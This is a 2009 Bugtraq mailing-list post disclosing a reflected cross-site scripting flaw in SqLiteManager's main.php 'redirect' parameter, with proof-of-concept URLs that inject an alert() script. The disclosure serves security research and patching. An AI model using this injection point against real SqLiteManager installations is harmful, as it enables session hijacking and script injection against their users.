
Date: 10 Aug 2009 06:59:13 -0000
From: hadikiamarsi@...mail.com
To: bugtraq@...urityfocus.com
Subject: XSS in SqLiteManager


###########################################
#
# SqLiteManager ( All Version ) Cross Site Scripting
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi@...il.com
#
# Download : http://downloads.sourceforge.net/project/sqlitemanager/sqlitemanager/1.2.0/SQLiteManager-1.2.0.zip?use_mirror=heanet
#
###########################################

PoC :

http://[www.example.com]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

http://[www.example.com]/[PATH]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>


local Example :


http://localhost/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>
